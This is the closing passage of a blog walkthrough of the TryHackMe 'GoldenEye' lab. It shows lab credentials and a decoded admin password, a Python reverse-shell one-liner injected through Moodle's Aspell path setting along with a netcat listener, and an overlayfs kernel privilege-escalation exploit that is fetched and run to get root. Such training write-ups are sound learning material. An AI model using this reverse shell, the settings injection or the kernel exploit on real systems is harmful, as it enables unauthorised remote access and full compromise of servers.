<li><p>What is this users password?</p>
<p>Answer: <code>4England!</code></p>
<p>Take a look at their files on the moodle (severnaya-station.com)</p>
<p>Using dr_doak’s account, we can find a <code>s3cret.txt</code> file in <code>My profile &gt; My private files</code>.</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/6qqpnsd8oot8viypjyq2y/18.png?rlkey=xohfuq3xfijpb86hjxfpwnkti&st=k2dzr9n7&dl=0"
                      alt="img"
                ></p>
</li>
<li><p>Download the attachments and see if there are any hidden messages inside them?</p>
<p>The following is the content of the file.</p>
</li>
</ol>
<div class="highlight-container" data-rel="Text"><figure class="iseeu highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">007,</span><br><span class="line"></span><br><span class="line">I was able to capture this apps adm1n cr3ds through clear txt. </span><br><span class="line"></span><br><span class="line">Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here. </span><br><span class="line"></span><br><span class="line">Something juicy is located here: /dir007key/for-007.jpg</span><br><span class="line"></span><br><span class="line">Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Using the information you found in the last task, login with the newly found user.`</span><br></pre></td></tr></table></figure></div>

<p>  <img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/p6wqop8r64izr6lh4r92o/20.png?rlkey=s9ld58mtzdi3q0ayesuq9ecgj&st=xge1fj1u&dl=0"
                      alt="img"
                ></p>
<p>  The image description  consists  base64 encoded string of admin password decoding it we get</p>
<pre><code>`xWinter1995x!`
</code></pre>
<ol start="7">
<li>Using the information you found in the last task, login with the newly found user.</li>
</ol>
<p>  As this user has more site privileges, you are able to edit the moodle’s settings. From here get a reverse shell using python and netcat.</p>
<p>  Take a look into Aspell, the spell checker plugin.</p>
<p>   Hint: <code>Settings-&gt;Aspell-&gt;Path to aspell</code> field, add your code to be executed. Then create a new page and “spell check it”.</p>
<p>   Open a listener:</p>
<p>   <code>$ rlwrap nc -nlvp 4444</code></p>
<p>   Now, from the Configuration panel, enter <code>spell</code> in the search. There are 2 settings to modify so that it works:</p>
<ul>
<li><p>Spell engine: PSpellShell</p>
</li>
<li><p>Path to aspell: your reverse shell</p>
<p>I used a python shell instead of the one set by default.</p>
<p> <img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/xnm7sngijdmzlrlt7utc4/21.png?rlkey=b2woetau6v8jegozm5iamno4r&st=h8xwgfn3&dl=0"
                      alt="img"
                ></p>
</li>
</ul>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">&#x27;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.10.10.37&quot;,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/bash&quot;,&quot;-i&quot;]);&#x27;</span></span><br></pre></td></tr></table></figure></div>

<p>  Go to <code>Navigation &gt; My profile &gt; Blog &gt; Add a new entry</code> and clik on the “Toggle spell checker” icon.</p>
<p>  Now you will have a reverse shell</p>
<p>   <img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/651krv7r6nkmhcxgt45gn/22.png?rlkey=33vwtvduruvaf359q8e60vdcl&st=g28rrf2o&dl=0"
                      alt="img"
                ></p>
<h3 id="Task-4-Privilege-Escalation"><a href="#Task-4-Privilege-Escalation" class="headerlink" title="Task 4:Privilege Escalation"></a><strong>Task 4:Privilege Escalation</strong></h3><p>Now that you have enumerated enough to get an administrative moodle login and gain a reverse shell, its time to priv esc.</p>
<p>Download the <a class="link"   target="_blank" rel="noopener" href="https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123" >linuxprivchecker <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a> to enumerate installed development tools.</p>
<p>To get the file onto the machine, you will need to wget your local machine as the VM will not be able to wget files on the internet. Follow the steps to get a file onto your VM:</p>
<ul>
<li>Download the linuxprivchecker file locally</li>
<li>Navigate to the file on your file system</li>
<li>Do: <strong>python -m SimpleHTTPServer 1337</strong> (leave this running)&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;</li>
<li>On the VM you can now do: wget <code>&lt;your IP&gt;/&lt;file&gt;.py</code></li>
</ul>
<p><strong>OR</strong></p>
<p>Enumerate the machine manually.</p>
<ol>
<li><p>Whats the kernel version?  </p>
<p>Ans: <code>3.13.0-32-generic</code></p>
<p> <img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/9bmpugml2qpcumf2qtojq/23.png?rlkey=m3pndfg87yvezauqiiyfvyj9h&st=4wdch480&dl=0"
                      alt="img"
                ></p>
</li>
</ol>
<p>This machine is vulnerable to the overlayfs exploit. The exploitation is technically very simple:</p>
<ul>
<li><p>Create new user and mount namespace using clone with CLONE_NEWUSER|CLONE_NEWNS flags.</p>
</li>
<li><p>Mount an overlayfs using &#x2F;bin as lower filesystem, some temporary directories as upper and work directory.</p>
</li>
<li><p>Overlayfs mount would only be visible within user namespace, so let namespace process change CWD to overlayfs, thus making the overlayfs also visible outside the namespace via the proc filesystem.</p>
</li>
<li><p>Make su on overlayfs world writable without changing the owner</p>
</li>
<li><p>Let process outside user namespace write arbitrary content to the file applying a slightly modified variant of the SetgidDirectoryPrivilegeEscalation exploit.</p>
</li>
<li><p>Execute the modified su binary</p>
<p>You can download the exploit from here: <a class="link"   target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/37292" >exploit-db 37292 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/ynyk3sb9fyd23o7txswgu/24.png?rlkey=3kbp6jb1v1seux6kpt041lpd9&st=3finwbtq&dl=0"
                      alt="img"
                ></p>
</li>
</ul>
<p>I downloaded the code using searchsploit</p>
<p>Once downloaded the code, I transfered it using python3</p>
<p> <img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/amjf5otd7ud39tie5hn42/25.png?rlkey=jn9fvskq3jtw316h89z2rjt9p&st=xj5mngfx&dl=0"
                      alt="img"
                ></p>
<p>Then I downloaded it in the reverse shell</p>
<p>   <img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/ry2ppuculynnt75gyi6q2/26.png?rlkey=7mfnc9ovknoeibtik0dlo0z65&st=41i3fod6&dl=0"
                      alt="img"
                ></p>
<p>Then I made the code to be executable</p>
<ul>
<li><p><strong><code>&quot;s/gcc/cc/g&quot;</code></strong>: This part is the <code>sed</code> substitution command.</p>
<ul>
<li><strong><code>s</code></strong>: This stands for substitute.</li>
<li><strong><code>gcc</code></strong>: This is the pattern to search for in the file. In this case, <code>gcc</code>.</li>
<li><strong><code>cc</code></strong>: This is the replacement string. In this case, <code>cc</code>.</li>
<li><strong><code>g</code></strong>: This is a global flag. It tells <code>sed</code> to replace all occurrences of the search pattern in each line, not just the first occurrence.</li>
</ul>
</li>
<li><p><strong><code>exploit.c</code></strong>: This is the name of the file that <code>sed</code> will process.</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/h5kz48bq2bj5uhejmaqqs/27.png?rlkey=1ud7n1e7jc5gix5p5xh7i6jf1&st=6mhvj82j&dl=0"
                      alt="img"
                ></p>
</li>
</ul>
<p>Then I ran the program to get root access</p>
<p>   <img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/qnnatod6w3qikbqmr5apx/28.png?rlkey=x1ioxgzgsibmujd2np92l694y&st=l8cp5rt5&dl=0"
                      alt="img"
                ></p>
<p>From there I changed directory to &#x2F;root</p>
<p>the flag was hidden in a file called flag.txt in root directory</p>
<p>  <img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/ha4jrf2desio7iv1yqu51/29.png?rlkey=lh44ytnytkjm04qeyspg847oh&st=hz0h58eh&dl=0"
                      alt="img"
                ></p>
<p> Ans: <code>568628e0d993b1973adc718237da6e93</code></p>
<p>Then Visiting the last URL shows a congratulations message with a movie clip of James Bond</p>
<p> <img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/1vt39xqllybeav58qhyrw/30.png?rlkey=3kek38g8ilgr8vzyeory7r9at&st=504f66lg&dl=0"
                      alt="img"
                ></p>
<p>See you on the next adventure!</p>

        </div>

        

        
            <ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/TryHackMe/">#TryHackMe</a>&nbsp;
                    </li>
                
            </ul>
        

        

        
            <div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
                
                    <div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="prev"
                        rel="prev"
                        href="/2024/09/29/spookifier/"
                        >
                            <span class="left arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-left"></i>
                            </span>
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">Spookifier</span>
                                <span class="post-nav-item">Prev posts</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="next"
                        rel="next"
                        href="/2024/09/21/Bashed/"
                        >
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">Bashed</span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        


        
            <div class="comment-container px-2 sm:px-6 md:px-8 pb-8">
                <div class="comments-container mt-10 w-full ">
    <div id="comment-anchor" class="w-full h-2.5"></div>
    <div class="comment-area-title w-full my-1.5 md:my-2.5 text-xl md:text-3xl font-bold">
        Comments
    </div>
    

        
            
    <div id="waline"></div>
    <script type="module" data-swup-reload-script>
      import { init } from '/js/libs/waline.mjs';

      function loadWaline() {
        init({
          el: '#waline',
          serverURL: 'https://example.example.com',
          lang: 'en-US',
          dark: 'body[class~="dark-mode"]',
          requiredMeta: ['nick', 'mail'],
          emoji: [],
          recaptchaV3Key: "wasd",
          
        });
      }

      if (typeof swup !== 'undefined') {
        loadWaline();
      } else {
        window.addEventListener('DOMContentLoaded', loadWaline);
      }
    </script>



        
    
</div>

            </div>
        
    </div>

    
        <div class="toc-content-container">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">GoldenEye</div>
        <ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#Task-4-Privilege-Escalation"><span class="nav-text">Task 4:Privilege Escalation</span></a></li></ol>

    </div>
</div>
        </div>
    
</div>



                

            </div>

            

        </div>

        <div class="main-content-footer">
            <footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2024&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">D K V V Varma</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        3 posts in total
                    </span>
                    
                </p>
            
        </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.6.2</a></span>
        </div>
        
        
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
            <li class="go-comment">
                <i class="fa-regular fa-comments"></i>
            </li>
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fa-solid fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="Search..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="popup-btn-close">
                <i class="fa-solid fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fa-solid fa-spinner fa-spin-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

</main>


    
<script src="/js/libs/Swup.min.js"></script>

<script src="/js/libs/SwupSlideTheme.min.js"></script>

<script src="/js/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>







<script src="/js/tools/imageViewer.js" type="module"></script>

<script src="/js/utils.js" type="module"></script>

<script src="/js/main.js" type="module"></script>

<script src="/js/layouts/navbarShrink.js" type="module"></script>

<script src="/js/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/layouts/categoryList.js" type="module"></script>



    
<script src="/js/tools/localSearch.js" type="module"></script>




    
<script src="/js/tools/codeBlock.js" type="module"></script>




    
<script src="/js/layouts/lazyload.js" type="module"></script>






  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js" type="module"></script>









<div class="post-scripts" data-swup-reload-script>
    
        
<script src="/js/tools/tocToggle.js" type="module"></script>

<script src="/js/layouts/toc.js" type="module"></script>

<script src="/js/plugins/tabs.js" type="module"></script>

    
</div>


</body>
</html>
